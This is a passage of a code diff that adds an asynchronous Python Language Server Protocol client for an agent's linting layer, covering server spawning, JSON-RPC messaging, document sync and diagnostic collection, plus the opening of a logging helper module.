--- /dev/null
+++ b/agent/lsp/client.py
@@ -0,0 +1,930 @@
+"""Async LSP client over stdin/stdout.
+
+One :class:`LSPClient` corresponds to one ``(language_server, workspace_root)``
+pair — exactly what OpenCode keys clients on, and the same shape Claude
+Code uses.  The client owns a child process, drives the JSON-RPC
+exchange, and exposes:
+
+- :meth:`open_file` / :meth:`change_file` — text document sync
+- :meth:`wait_for_diagnostics` — block until the server emits fresh
+  diagnostics for a specific file (or a timeout fires)
+- :meth:`diagnostics_for` — read the current per-file diagnostic store
+- :meth:`shutdown` — graceful close + SIGTERM/SIGKILL fallback
+
+The class is designed for async use from a single asyncio event loop.
+The :class:`agent.lsp.manager.LSPService` runs an event loop in a
+background thread so the synchronous file_operations layer can call
+into it via :func:`agent.lsp.manager.LSPService.touch_file`.
+
+Implementation notes:
+
+- Push diagnostics are stored per-URI in :attr:`_push_diagnostics` from
+  ``textDocument/publishDiagnostics`` notifications.  Pull diagnostics
+  go in :attr:`_pull_diagnostics`.  The merged view dedupes by content.
+
+- Whole-document sync.  Even when the server advertises incremental
+  sync, we send a single ``contentChanges`` entry replacing the
+  entire document.  Pretending to be incremental while sending a
+  full replacement is well-tolerated by every major server and saves
+  range bookkeeping.  See OpenCode's ``client.ts:584-659`` for the
+  same trick.
+
+- The "touch-file dance": every ``open_file`` call also fires a
+  ``workspace/didChangeWatchedFiles`` notification (CREATED on the
+  first open, CHANGED thereafter).  Some servers (clangd, eslint)
+  only re-scan when this notification fires, even though the LSP spec
+  doesn't strictly require it.
+
+- ``ContentModified`` (-32801) errors get retried with exponential
+  backoff up to 3 times.  This matches Claude Code's
+  ``LSPServerInstance.sendRequest``.
+"""
+from __future__ import annotations
+
+import asyncio
+import logging
+import os
+from pathlib import Path
+from typing import Any, Awaitable, Callable, Dict, List, Optional, Set
+from urllib.parse import quote, unquote
+
+from agent.lsp.protocol import (
+    ERROR_CONTENT_MODIFIED,
+    ERROR_METHOD_NOT_FOUND,
+    LSPProtocolError,
+    LSPRequestError,
+    classify_message,
+    encode_message,
+    make_error_response,
+    make_notification,
+    make_request,
+    make_response,
+    read_message,
+)
+
+logger = logging.getLogger("agent.lsp.client")
+
+# Timeouts (seconds) — mirror OpenCode's constants, scaled to seconds.
+INITIALIZE_TIMEOUT = 45.0
+DIAGNOSTICS_DOCUMENT_WAIT = 5.0
+DIAGNOSTICS_FULL_WAIT = 10.0
+DIAGNOSTICS_REQUEST_TIMEOUT = 3.0
+PUSH_DEBOUNCE = 0.15
+SHUTDOWN_GRACE = 1.0  # seconds between SIGTERM and SIGKILL
+
+# Retry policy for transient ContentModified errors.
+MAX_CONTENT_MODIFIED_RETRIES = 3
+RETRY_BASE_DELAY = 0.5  # 0.5, 1.0, 2.0 — exponential
+
+
+def file_uri(path: str) -> str:
+    """Return ``file://`` URI for an absolute filesystem path.
+
+    Mirrors Node's ``pathToFileURL`` — handles spaces, unicode, and
+    Windows drive letters (``C:\\foo`` → ``file:///C:/foo``).
+    """
+    abs_path = os.path.abspath(path)
+    if os.name == "nt":
+        # Windows: backslash → forward slash, prepend extra slash so
+        # the drive letter shows up as part of the path component.
+        abs_path = abs_path.replace("\\", "/")
+        if not abs_path.startswith("/"):
+            abs_path = "/" + abs_path
+    return "file://" + quote(abs_path, safe="/:")
+
+
+def uri_to_path(uri: str) -> str:
+    """Inverse of :func:`file_uri`."""
+    if not uri.startswith("file://"):
+        return uri
+    raw = uri[len("file://"):]
+    if os.name == "nt" and raw.startswith("/") and len(raw) > 2 and raw[2] == ":":
+        raw = raw[1:]  # strip leading slash before drive letter
+    return os.path.normpath(unquote(raw))
+
+
+def _end_position(text: str) -> Dict[str, int]:
+    """Return the LSP Position at the end of ``text``.
+
+    Used to construct a single-range "replace whole document" change
+    for ``textDocument/didChange`` regardless of the server's declared
+    sync mode.
+    """
+    if not text:
+        return {"line": 0, "character": 0}
+    lines = text.splitlines(keepends=False)
+    last_line = len(lines) - 1
+    last_col = len(lines[-1]) if lines else 0
+    # If the text ends with a trailing newline, ``splitlines`` won't
+    # represent it.  The end position is then the start of the next
+    # (empty) line — line index is len(lines), column 0.
+    if text.endswith(("\n", "\r")):
+        return {"line": last_line + 1, "character": 0}
+    return {"line": last_line, "character": last_col}
+
+
+class LSPClient:
+    """Async LSP client tied to one server process and one workspace root.
+
+    Lifecycle:
+
+        c = LSPClient(server_id, workspace_root, command, args, init_options)
+        await c.start()       # spawn + initialize
+        ver = await c.open_file("/path/to/foo.py")
+        await c.wait_for_diagnostics("/path/to/foo.py", ver)
+        diags = c.diagnostics_for("/path/to/foo.py")
+        await c.shutdown()
+    """
+
+    # ------------------------------------------------------------------
+    # construction + lifecycle
+    # ------------------------------------------------------------------
+
+    def __init__(
+        self,
+        *,
+        server_id: str,
+        workspace_root: str,
+        command: List[str],
+        env: Optional[Dict[str, str]] = None,
+        cwd: Optional[str] = None,
+        initialization_options: Optional[Dict[str, Any]] = None,
+        seed_diagnostics_on_first_push: bool = False,
+    ) -> None:
+        self.server_id = server_id
+        self.workspace_root = workspace_root
+        self._command = list(command)
+        self._env = env
+        self._cwd = cwd or workspace_root
+        self._init_options = initialization_options or {}
+        self._seed_first_push = seed_diagnostics_on_first_push
+
+        # Process + streams
+        self._proc: Optional[asyncio.subprocess.Process] = None
+        self._stderr_task: Optional[asyncio.Task] = None
+        self._reader_task: Optional[asyncio.Task] = None
+
+        # Request/response correlation
+        self._next_id: int = 0
+        self._pending: Dict[int, asyncio.Future] = {}
+
+        # Server-side request handlers (server → client requests).
+        # Kept small and explicit; everything else returns method-not-found.
+        self._request_handlers: Dict[str, Callable[[Any], Awaitable[Any]]] = {
+            "window/workDoneProgress/create": self._handle_work_done_create,
+            "workspace/configuration": self._handle_workspace_configuration,
+            "client/registerCapability": self._handle_register_capability,
+            "client/unregisterCapability": self._handle_unregister_capability,
+            "workspace/workspaceFolders": self._handle_workspace_folders,
+            "workspace/diagnostic/refresh": self._handle_diagnostic_refresh,
+        }
+        # Notifications (server → client) we care about.
+        self._notification_handlers: Dict[str, Callable[[Any], None]] = {
+            "textDocument/publishDiagnostics": self._handle_publish_diagnostics,
+            # Everything else (window/showMessage, $/progress, etc.)
+            # is silently dropped by default.
+        }
+
+        # Tracked file state — required for didChange version bumps.
+        self._files: Dict[str, Dict[str, Any]] = {}
+        # Diagnostic stores, keyed by file path (NOT URI).
+        self._push_diagnostics: Dict[str, List[Dict[str, Any]]] = {}
+        self._pull_diagnostics: Dict[str, List[Dict[str, Any]]] = {}
+        # Per-path "last published" time so wait-for-fresh logic works.
+        self._published: Dict[str, float] = {}
+        # Per-path version of the latest push (matches our didChange
+        # version when the server respects it).
+        self._published_version: Dict[str, int] = {}
+        # First-push seen flag, for typescript-style seed-on-first-push.
+        self._first_push_seen: Set[str] = set()
+        # Capability registrations — only diagnostic ones are tracked.
+        self._diagnostic_registrations: Dict[str, Dict[str, Any]] = {}
+
+        # State machine
+        self._state: str = "stopped"
+        self._initialize_result: Optional[Dict[str, Any]] = None
+        self._sync_kind: int = 1  # 1=Full, 2=Incremental
+        self._stopping: bool = False
+
+        # Push event for waiters.
+        self._push_event = asyncio.Event()
+        # Monotonic counter incremented on every publishDiagnostics push.
+        # Waiters snapshot it on entry and treat any increase as
+        # "something happened, recheck the predicate".  Avoids the
+        # asyncio.Event sticky-state trap.
+        self._push_counter = 0
+        # Registration change event so wait_for_diagnostics can re-loop
+        # when the server announces a new dynamic provider.
+        self._registration_event = asyncio.Event()
+
+    @property
+    def is_running(self) -> bool:
+        return self._state == "running" and self._proc is not None and self._proc.returncode is None
+
+    @property
+    def state(self) -> str:
+        return self._state
+
+    async def start(self) -> None:
+        """Spawn the server and complete the initialize handshake.
+
+        Raises any exception encountered during spawn/init.  On failure
+        the process is killed and the client is left in state
+        ``"error"`` — re-call ``start()`` to retry.
+        """
+        if self._state in ("running", "starting"):
+            return
+        self._state = "starting"
+        try:
+            await self._spawn()
+            await self._initialize()
+            self._state = "running"
+        except Exception:
+            self._state = "error"
+            await self._cleanup_process()
+            raise
+
+    async def _spawn(self) -> None:
+        env = dict(os.environ)
+        if self._env:
+            env.update(self._env)
+
+        try:
+            self._proc = await asyncio.create_subprocess_exec(
+                self._command[0],
+                *self._command[1:],
+                stdin=asyncio.subprocess.PIPE,
+                stdout=asyncio.subprocess.PIPE,
+                stderr=asyncio.subprocess.PIPE,
+                env=env,
+                cwd=self._cwd,
+            )
+        except FileNotFoundError as e:
+            raise LSPProtocolError(
+                f"LSP server binary not found: {self._command[0]} ({e})"
+            ) from e
+
+        # Drain stderr at debug level — if we don't, the pipe buffer
+        # fills and the server hangs.
+        self._stderr_task = asyncio.create_task(self._drain_stderr())
+        # Start the reader loop.
+        self._reader_task = asyncio.create_task(self._reader_loop())
+
+    async def _drain_stderr(self) -> None:
+        if self._proc is None or self._proc.stderr is None:
+            return
+        try:
+            while True:
+                line = await self._proc.stderr.readline()
+                if not line:
+                    break
+                text = line.decode("utf-8", errors="replace").rstrip()
+                if text:
+                    logger.debug("[%s] stderr: %s", self.server_id, text[:1000])
+        except (asyncio.CancelledError, OSError):
+            pass
+
+    async def _reader_loop(self) -> None:
+        if self._proc is None or self._proc.stdout is None:
+            return
+        try:
+            while True:
+                msg = await read_message(self._proc.stdout)
+                if msg is None:
+                    logger.debug("[%s] server closed stdout cleanly", self.server_id)
+                    break
+                kind, key = classify_message(msg)
+                if kind == "response":
+                    self._dispatch_response(key, msg)
+                elif kind == "request":
+                    asyncio.create_task(self._dispatch_request(key, msg))
+                elif kind == "notification":
+                    self._dispatch_notification(key, msg)
+                else:
+                    logger.warning("[%s] dropping invalid message: %r", self.server_id, msg)
+        except LSPProtocolError as e:
+            logger.warning("[%s] protocol error in reader loop: %s", self.server_id, e)
+        except (asyncio.CancelledError, OSError):
+            pass
+        finally:
+            # Wake up any pending requests so they can fail fast.
+            for fut in list(self._pending.values()):
+                if not fut.done():
+                    fut.set_exception(LSPProtocolError("server connection closed"))
+            self._pending.clear()
+
+    async def _initialize(self) -> None:
+        params = {
+            "rootUri": file_uri(self.workspace_root),
+            "rootPath": self.workspace_root,
+            "processId": os.getpid(),
+            "workspaceFolders": [
+                {"name": "workspace", "uri": file_uri(self.workspace_root)}
+            ],
+            "initializationOptions": self._init_options,
+            "capabilities": {
+                "window": {"workDoneProgress": True},
+                "workspace": {
+                    "configuration": True,
+                    "workspaceFolders": True,
+                    "didChangeWatchedFiles": {"dynamicRegistration": True},
+                    "diagnostics": {"refreshSupport": False},
+                },
+                "textDocument": {
+                    "synchronization": {
+                        "dynamicRegistration": False,
+                        "didOpen": True,
+                        "didChange": True,
+                        "didSave": True,
+                        "willSave": False,
+                        "willSaveWaitUntil": False,
+                    },
+                    "diagnostic": {
+                        "dynamicRegistration": True,
+                        "relatedDocumentSupport": True,
+                    },
+                    "publishDiagnostics": {
+                        "relatedInformation": True,
+                        "tagSupport": {"valueSet": [1, 2]},
+                        "versionSupport": True,
+                        "codeDescriptionSupport": True,
+                        "dataSupport": False,
+                    },
+                    "hover": {"contentFormat": ["markdown", "plaintext"]},
+                    "definition": {"linkSupport": True},
+                    "references": {},
+                    "documentSymbol": {"hierarchicalDocumentSymbolSupport": True},
+                },
+                "general": {"positionEncodings": ["utf-16"]},
+            },
+        }
+
+        result = await asyncio.wait_for(
+            self._send_request("initialize", params),
+            timeout=INITIALIZE_TIMEOUT,
+        )
+        self._initialize_result = result
+        self._sync_kind = self._extract_sync_kind(result.get("capabilities") or {})
+
+        await self._send_notification("initialized", {})
+        if self._init_options:
+            # Some servers (vtsls, eslint) want config pushed via
+            # didChangeConfiguration even if it was sent in
+            # initializationOptions.
+            await self._send_notification(
+                "workspace/didChangeConfiguration",
+                {"settings": self._init_options},
+            )
+
+    @staticmethod
+    def _extract_sync_kind(capabilities: dict) -> int:
+        sync = capabilities.get("textDocumentSync")
+        if isinstance(sync, int):
+            return sync
+        if isinstance(sync, dict):
+            change = sync.get("change")
+            if isinstance(change, int):
+                return change
+        return 1  # default to Full
+
+    async def shutdown(self) -> None:
+        """Best-effort graceful shutdown.
+
+        Sends ``shutdown`` + ``exit``, then SIGTERMs/SIGKILLs the
+        process if it doesn't exit cleanly.  Idempotent.
+        """
+        if self._stopping:
+            return
+        self._stopping = True
+        try:
+            if self.is_running:
+                try:
+                    await asyncio.wait_for(self._send_request("shutdown", None), timeout=2.0)
+                except (asyncio.TimeoutError, LSPRequestError, LSPProtocolError):
+                    pass
+                try:
+                    await self._send_notification("exit", None)
+                except Exception:
+                    pass
+        finally:
+            self._state = "stopped"
+            await self._cleanup_process()
+
+    async def _cleanup_process(self) -> None:
+        if self._reader_task is not None and not self._reader_task.done():
+            self._reader_task.cancel()
+            try:
+                await self._reader_task
+            except (asyncio.CancelledError, Exception):  # noqa: BLE001
+                pass
+        if self._stderr_task is not None and not self._stderr_task.done():
+            self._stderr_task.cancel()
+            try:
+                await self._stderr_task
+            except (asyncio.CancelledError, Exception):  # noqa: BLE001
+                pass
+        proc = self._proc
+        self._proc = None
+        if proc is None:
+            return
+        if proc.returncode is None:
+            try:
+                proc.terminate()
+                try:
+                    await asyncio.wait_for(proc.wait(), timeout=SHUTDOWN_GRACE)
+                except asyncio.TimeoutError:
+                    try:
+                        proc.kill()
+                        await proc.wait()
+                    except ProcessLookupError:
+                        pass
+            except ProcessLookupError:
+                pass
+
+    # ------------------------------------------------------------------
+    # request / notification plumbing
+    # ------------------------------------------------------------------
+
+    async def _send_request(self, method: str, params: Any) -> Any:
+        if self._proc is None or self._proc.stdin is None or self._proc.stdin.is_closing():
+            raise LSPProtocolError(f"cannot send {method!r}: stdin closed")
+        loop = asyncio.get_running_loop()
+        req_id = self._next_id
+        self._next_id += 1
+        fut: asyncio.Future = loop.create_future()
+        self._pending[req_id] = fut
+        try:
+            self._proc.stdin.write(encode_message(make_request(req_id, method, params)))
+            await self._proc.stdin.drain()
+        except (BrokenPipeError, ConnectionResetError, OSError) as e:
+            self._pending.pop(req_id, None)
+            raise LSPProtocolError(f"send failed for {method!r}: {e}") from e
+        try:
+            return await fut
+        finally:
+            self._pending.pop(req_id, None)
+
+    async def _send_request_with_retry(self, method: str, params: Any, *, timeout: float) -> Any:
+        """Send a request, retrying on ``ContentModified`` (-32801).
+
+        Other errors propagate.  The retry policy matches Claude Code's
+        ``LSPServerInstance.sendRequest`` — 3 attempts with delays
+        0.5s, 1.0s, 2.0s.
+        """
+        for attempt in range(MAX_CONTENT_MODIFIED_RETRIES + 1):
+            try:
+                return await asyncio.wait_for(self._send_request(method, params), timeout=timeout)
+            except LSPRequestError as e:
+                if e.code == ERROR_CONTENT_MODIFIED and attempt < MAX_CONTENT_MODIFIED_RETRIES:
+                    await asyncio.sleep(RETRY_BASE_DELAY * (2 ** attempt))
+                    continue
+                raise
+
+    async def _send_notification(self, method: str, params: Any) -> None:
+        if self._proc is None or self._proc.stdin is None or self._proc.stdin.is_closing():
+            return
+        try:
+            self._proc.stdin.write(encode_message(make_notification(method, params)))
+            await self._proc.stdin.drain()
+        except (BrokenPipeError, ConnectionResetError, OSError) as e:
+            logger.debug("[%s] notify %s failed: %s", self.server_id, method, e)
+
+    async def _send_response(self, req_id: Any, result: Any) -> None:
+        if self._proc is None or self._proc.stdin is None or self._proc.stdin.is_closing():
+            return
+        try:
+            self._proc.stdin.write(encode_message(make_response(req_id, result)))
+            await self._proc.stdin.drain()
+        except (BrokenPipeError, ConnectionResetError, OSError):
+            pass
+
+    async def _send_error_response(self, req_id: Any, code: int, message: str) -> None:
+        if self._proc is None or self._proc.stdin is None or self._proc.stdin.is_closing():
+            return
+        try:
+            self._proc.stdin.write(encode_message(make_error_response(req_id, code, message)))
+            await self._proc.stdin.drain()
+        except (BrokenPipeError, ConnectionResetError, OSError):
+            pass
+
+    def _dispatch_response(self, req_id: int, msg: dict) -> None:
+        fut = self._pending.get(req_id)
+        if fut is None or fut.done():
+            return
+        if "error" in msg:
+            err = msg["error"] or {}
+            fut.set_exception(
+                LSPRequestError(
+                    code=int(err.get("code", -32000)),
+                    message=str(err.get("message", "unknown")),
+                    data=err.get("data"),
+                )
+            )
+        else:
+            fut.set_result(msg.get("result"))
+
+    async def _dispatch_request(self, req_id: Any, msg: dict) -> None:
+        method = msg.get("method", "")
+        params = msg.get("params")
+        handler = self._request_handlers.get(method)
+        if handler is None:
+            await self._send_error_response(req_id, ERROR_METHOD_NOT_FOUND, f"method not found: {method}")
+            return
+        try:
+            result = await handler(params)
+        except Exception as e:  # noqa: BLE001 — protocol must not blow up
+            logger.warning("[%s] request handler %s failed: %s", self.server_id, method, e)
+            await self._send_error_response(req_id, -32000, f"handler failed: {e}")
+            return
+        await self._send_response(req_id, result)
+
+    def _dispatch_notification(self, method: str, msg: dict) -> None:
+        handler = self._notification_handlers.get(method)
+        if handler is None:
+            return
+        try:
+            handler(msg.get("params"))
+        except Exception as e:  # noqa: BLE001
+            logger.debug("[%s] notification handler %s failed: %s", self.server_id, method, e)
+
+    # ------------------------------------------------------------------
+    # built-in server-→-client request handlers
+    # ------------------------------------------------------------------
+
+    async def _handle_work_done_create(self, params: Any) -> Any:
+        # Acknowledge progress tokens — required by some servers.
+        return None
+
+    async def _handle_workspace_configuration(self, params: Any) -> Any:
+        # Walk dotted sections through initializationOptions.  Mirrors
+        # OpenCode's `client.ts:198-220` — return null when missing.
+        if not isinstance(params, dict):
+            return [None]
+        items = params.get("items") or []
+        out: List[Any] = []
+        for item in items:
+            if not isinstance(item, dict):
+                out.append(None)
+                continue
+            section = item.get("section")
+            if not section or not self._init_options:
+                out.append(self._init_options or None)
+                continue
+            cur: Any = self._init_options
+            for part in str(section).split("."):
+                if isinstance(cur, dict) and part in cur:
+                    cur = cur[part]
+                else:
+                    cur = None
+                    break
+            out.append(cur)
+        return out
+
+    async def _handle_register_capability(self, params: Any) -> Any:
+        if not isinstance(params, dict):
+            return None
+        for reg in params.get("registrations") or []:
+            if not isinstance(reg, dict):
+                continue
+            method = reg.get("method")
+            reg_id = reg.get("id")
+            if method == "textDocument/diagnostic" and reg_id:
+                self._diagnostic_registrations[str(reg_id)] = reg
+                self._registration_event.set()
+        return None
+
+    async def _handle_unregister_capability(self, params: Any) -> Any:
+        if not isinstance(params, dict):
+            return None
+        for unreg in params.get("unregisterations") or []:
+            if not isinstance(unreg, dict):
+                continue
+            reg_id = unreg.get("id")
+            if reg_id:
+                self._diagnostic_registrations.pop(str(reg_id), None)
+        return None
+
+    async def _handle_workspace_folders(self, params: Any) -> Any:
+        return [{"name": "workspace", "uri": file_uri(self.workspace_root)}]
+
+    async def _handle_diagnostic_refresh(self, params: Any) -> Any:
+        # We don't honour refresh — we re-pull on every touchFile.
+        return None
+
+    # ------------------------------------------------------------------
+    # publishDiagnostics handler
+    # ------------------------------------------------------------------
+
+    def _handle_publish_diagnostics(self, params: Any) -> None:
+        if not isinstance(params, dict):
+            return
+        uri = params.get("uri")
+        if not isinstance(uri, str):
+            return
+        path = uri_to_path(uri)
+        diagnostics = params.get("diagnostics") or []
+        if not isinstance(diagnostics, list):
+            diagnostics = []
+        version = params.get("version")
+        loop_time = asyncio.get_event_loop().time()
+
+        if self._seed_first_push and path not in self._first_push_seen:
+            # First push: seed without firing the event so a waiter
+            # doesn't resolve on the very first push (which arrives
+            # before the user-triggered didChange could've produced
+            # fresh diagnostics).
+            self._first_push_seen.add(path)
+            self._push_diagnostics[path] = diagnostics
+            self._published[path] = loop_time
+            if isinstance(version, int):
+                self._published_version[path] = version
+            return
+
+        self._push_diagnostics[path] = diagnostics
+        self._published[path] = loop_time
+        if isinstance(version, int):
+            self._published_version[path] = version
+        self._first_push_seen.add(path)
+        # Bump the monotonic push counter and wake every waiter.  We
+        # keep the Event sticky-set so any wait already in progress
+        # resolves; waiters re-check their predicate after waking and
+        # decide whether to keep waiting.  ``_push_counter`` is what
+        # they actually compare against to detect a fresh event.
+        self._push_counter += 1
+        self._push_event.set()
+
+    # ------------------------------------------------------------------
+    # public file-sync API
+    # ------------------------------------------------------------------
+
+    async def open_file(self, path: str, *, language_id: str = "plaintext") -> int:
+        """Send didOpen (first time) or didChange (subsequent) for ``path``.
+
+        Returns the new document version number that the agent's
+        ``wait_for_diagnostics`` should match against.
+        """
+        if not self.is_running:
+            raise LSPProtocolError("client not running")
+
+        abs_path = os.path.abspath(path)
+        try:
+            text = Path(abs_path).read_text(encoding="utf-8", errors="replace")
+        except OSError as e:
+            raise LSPProtocolError(f"cannot read {abs_path}: {e}") from e
+
+        uri = file_uri(abs_path)
+        existing = self._files.get(abs_path)
+
+        if existing is not None:
+            # Re-open: bump version, fire didChangeWatchedFiles + didChange.
+            await self._send_notification(
+                "workspace/didChangeWatchedFiles",
+                {"changes": [{"uri": uri, "type": 2}]},  # 2 = CHANGED
+            )
+            new_version = existing["version"] + 1
+            old_text = existing["text"]
+            content_changes: List[Dict[str, Any]]
+            if self._sync_kind == 2:
+                content_changes = [
+                    {
+                        "range": {
+                            "start": {"line": 0, "character": 0},
+                            "end": _end_position(old_text),
+                        },
+                        "text": text,
+                    }
+                ]
+            else:
+                content_changes = [{"text": text}]
+            await self._send_notification(
+                "textDocument/didChange",
+                {
+                    "textDocument": {"uri": uri, "version": new_version},
+                    "contentChanges": content_changes,
+                },
+            )
+            self._files[abs_path] = {"version": new_version, "text": text}
+            return new_version
+
+        # First open: didChangeWatchedFiles CREATED + didOpen.
+        await self._send_notification(
+            "workspace/didChangeWatchedFiles",
+            {"changes": [{"uri": uri, "type": 1}]},  # 1 = CREATED
+        )
+        # Clear any stale push/pull entries — fresh open should start
+        # from scratch.
+        self._push_diagnostics.pop(abs_path, None)
+        self._pull_diagnostics.pop(abs_path, None)
+        self._published.pop(abs_path, None)
+        self._published_version.pop(abs_path, None)
+        await self._send_notification(
+            "textDocument/didOpen",
+            {
+                "textDocument": {
+                    "uri": uri,
+                    "languageId": language_id,
+                    "version": 0,
+                    "text": text,
+                }
+            },
+        )
+        self._files[abs_path] = {"version": 0, "text": text}
+        return 0
+
+    async def save_file(self, path: str) -> None:
+        """Send didSave for ``path``.  Some linters re-scan only on save."""
+        if not self.is_running:
+            return
+        abs_path = os.path.abspath(path)
+        await self._send_notification(
+            "textDocument/didSave",
+            {"textDocument": {"uri": file_uri(abs_path)}},
+        )
+
+    # ------------------------------------------------------------------
+    # diagnostics: pull + wait
+    # ------------------------------------------------------------------
+
+    async def _pull_document_diagnostics(self, path: str) -> None:
+        """Send ``textDocument/diagnostic`` for one file.
+
+        Stores results into :attr:`_pull_diagnostics`.  Silently
+        no-ops on errors (server may not support the pull endpoint).
+        """
+        try:
+            params: Dict[str, Any] = {
+                "textDocument": {"uri": file_uri(os.path.abspath(path))}
+            }
+            result = await self._send_request_with_retry(
+                "textDocument/diagnostic",
+                params,
+                timeout=DIAGNOSTICS_REQUEST_TIMEOUT,
+            )
+        except (LSPRequestError, LSPProtocolError, asyncio.TimeoutError) as e:
+            logger.debug("[%s] document diagnostic pull failed: %s", self.server_id, e)
+            return
+        if not isinstance(result, dict):
+            return
+        items = result.get("items")
+        if isinstance(items, list):
+            self._pull_diagnostics[os.path.abspath(path)] = items
+        related = result.get("relatedDocuments")
+        if isinstance(related, dict):
+            for uri, sub in related.items():
+                if not isinstance(sub, dict):
+                    continue
+                sub_items = sub.get("items")
+                if isinstance(sub_items, list):
+                    self._pull_diagnostics[uri_to_path(uri)] = sub_items
+
+    async def wait_for_diagnostics(
+        self,
+        path: str,
+        version: int,
+        *,
+        mode: str = "document",
+    ) -> None:
+        """Wait for the server to publish diagnostics for ``path`` at ``version``.
+
+        ``mode`` is ``"document"`` (5s budget, document pulls) or
+        ``"full"`` (10s budget, also workspace pulls).  Best-effort —
+        returns silently on timeout.  Does NOT throw if the server
+        doesn't support pull diagnostics; we still get the push side.
+        """
+        budget = DIAGNOSTICS_FULL_WAIT if mode == "full" else DIAGNOSTICS_DOCUMENT_WAIT
+        deadline = asyncio.get_event_loop().time() + budget
+        abs_path = os.path.abspath(path)
+
+        while True:
+            remaining = deadline - asyncio.get_event_loop().time()
+            if remaining <= 0:
+                return
+
+            # Concurrent: document pull + push wait.
+            pull_task = asyncio.create_task(self._pull_document_diagnostics(abs_path))
+            push_task = asyncio.create_task(self._wait_for_fresh_push(abs_path, version, remaining))
+            done, pending = await asyncio.wait(
+                {pull_task, push_task},
+                timeout=remaining,
+                return_when=asyncio.FIRST_COMPLETED,
+            )
+            for t in pending:
+                t.cancel()
+            for t in pending:
+                try:
+                    await t
+                except (asyncio.CancelledError, Exception):  # noqa: BLE001
+                    pass
+
+            # If we got a fresh push for our version, we're done.
+            current_v = self._published_version.get(abs_path)
+            if abs_path in self._published and (
+                current_v is None or current_v >= version
+            ):
+                return
+
+            # Pull may have populated _pull_diagnostics — that's also
+            # success.
+            if abs_path in self._pull_diagnostics:
+                return
+
+            # Loop until budget runs out.
+
+    async def _wait_for_fresh_push(self, path: str, version: int, timeout: float) -> None:
+        """Wait until a publishDiagnostics arrives for ``path`` at ``version``+."""
+        deadline = asyncio.get_event_loop().time() + timeout
+        baseline = self._push_counter
+        while True:
+            current_v = self._published_version.get(path)
+            if path in self._published and (current_v is None or current_v >= version):
+                # Debounce — wait a tick in case more diagnostics arrive
+                # immediately after.  TS often emits in pairs.  We
+                # snapshot the counter so we wake on a *new* push, not
+                # on the one that satisfied us a moment ago.
+                debounce_baseline = self._push_counter
+                debounce_deadline = asyncio.get_event_loop().time() + PUSH_DEBOUNCE
+                while self._push_counter == debounce_baseline:
+                    remaining = debounce_deadline - asyncio.get_event_loop().time()
+                    if remaining <= 0:
+                        break
+                    self._push_event.clear()
+                    try:
+                        await asyncio.wait_for(self._push_event.wait(), timeout=remaining)
+                    except asyncio.TimeoutError:
+                        break
+                return
+            remaining = deadline - asyncio.get_event_loop().time()
+            if remaining <= 0:
+                return
+            if self._push_counter > baseline:
+                # New event arrived but predicate still false — re-check
+                # immediately without waiting again.
+                baseline = self._push_counter
+                continue
+            self._push_event.clear()
+            try:
+                await asyncio.wait_for(self._push_event.wait(), timeout=min(remaining, 0.5))
+            except asyncio.TimeoutError:
+                continue
+
+    def diagnostics_for(self, path: str) -> List[Dict[str, Any]]:
+        """Return current merged + deduped diagnostics for one file.
+
+        Diagnostics from push and pull stores are concatenated and
+        deduplicated by ``(severity, code, message, range)`` content
+        key.  Empty list if the server hasn't published anything.
+        """
+        abs_path = os.path.abspath(path)
+        push = self._push_diagnostics.get(abs_path) or []
+        pull = self._pull_diagnostics.get(abs_path) or []
+        return _dedupe(push, pull)
+
+
+def _dedupe(*lists: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
+    seen: Set[str] = set()
+    out: List[Dict[str, Any]] = []
+    for lst in lists:
+        for d in lst:
+            if not isinstance(d, dict):
+                continue
+            key = _diagnostic_key(d)
+            if key in seen:
+                continue
+            seen.add(key)
+            out.append(d)
+    return out
+
+
+def _diagnostic_key(d: Dict[str, Any]) -> str:
+    """Content-equality key for a diagnostic.
+
+    Matches the structural-equality used in claude-code's
+    ``areDiagnosticsEqual`` — message + severity + source + code +
+    range coords.  The range is reduced to a tuple to keep the key
+    stable across dict orderings.
+    """
+    rng = d.get("range") or {}
+    start = rng.get("start") or {}
+    end = rng.get("end") or {}
+    code = d.get("code")
+    if code is not None and not isinstance(code, str):
+        code = str(code)
+    return "\x00".join(
+        [
+            str(d.get("severity") or 1),
+            str(code or ""),
+            str(d.get("source") or ""),
+            str(d.get("message") or "").strip(),
+            f"{start.get('line', 0)}:{start.get('character', 0)}-{end.get('line', 0)}:{end.get('character', 0)}",
+        ]
+    )
+
+
+__all__ = [
+    "LSPClient",
+    "file_uri",
+    "uri_to_path",
+    "INITIALIZE_TIMEOUT",
+    "DIAGNOSTICS_DOCUMENT_WAIT",
+    "DIAGNOSTICS_FULL_WAIT",
+]
diff --git a/agent/lsp/eventlog.py b/agent/lsp/eventlog.py
new file mode 100644
index 00000000000..b38627504b4
--- /dev/null
+++ b/agent/lsp/eventlog.py
@@ -0,0 +1,213 @@
+"""Structured logging with steady-state silence for the LSP layer.
+
+The LSP layer fires on every write_file/patch.  In a busy session
+that's hundreds of events.  We want users to be able to ``rg`` the
+log for "did LSP fire on that edit?" without drowning in noise.
+
+The level model:
+
+- ``DEBUG`` for steady-state events that have no novel signal:
+  ``clean``, ``feature off``, ``extension not mapped``, ``no project
+  root for already-announced file``, ``server unavailable for
+  already-announced binary``.  These never reach ``agent.log`` at the
+  default INFO threshold.
+
+- ``INFO`` for state transitions worth surfacing exactly once per
+  session: ``active for <root>`` the first time a (server_id,
+  workspace_root) client starts, ``no project root for <path>``
+  the first time we see that file.  Plus every diagnostic event
+  (those are inherently rare and per-edit, exactly what users grep
+  for).
+
+- ``WARNING`` for action-required failures: ``server unavailable``
+  (binary not on PATH) the first time per (server_id, binary),
+  ``no server configured`` once per language.  Per-call WARNING for
+  timeouts and unexpected bridge exceptions.
+
+The dedup is in-process module-level sets.  Each set grows at most by
+the number of distinct (server_id, root) and (server_id, binary)
+pairs touched in one Python process — bytes of memory in even an
+aggressive monorepo session.  Bounded LRU was rejected: evicting an
+entry would risk re-firing the WARNING/INFO line we explicitly want
+to suppress.
+
+Grep recipe::
+
+    tail -f ~/.hermes/logs/agent.log | rg 'lsp\\['
+"""
+from __future__ import annotations
+
+import logging
+import os
+import threading
+from typing import Tuple
+
+# Dedicated logger name so the documented grep recipe survives a
+# ``logging.getLogger(__name__)`` rename of any internal module.
+event_log = logging.getLogger("hermes.lint.lsp")
+
+# ---------------------------------------------------------------------------
+# Once-per-X dedup sets
+# ---------------------------------------------------------------------------
+
+_announce_lock = threading.Lock()
+_announced_active: set = set()        # keys: (server_id, workspace_root)
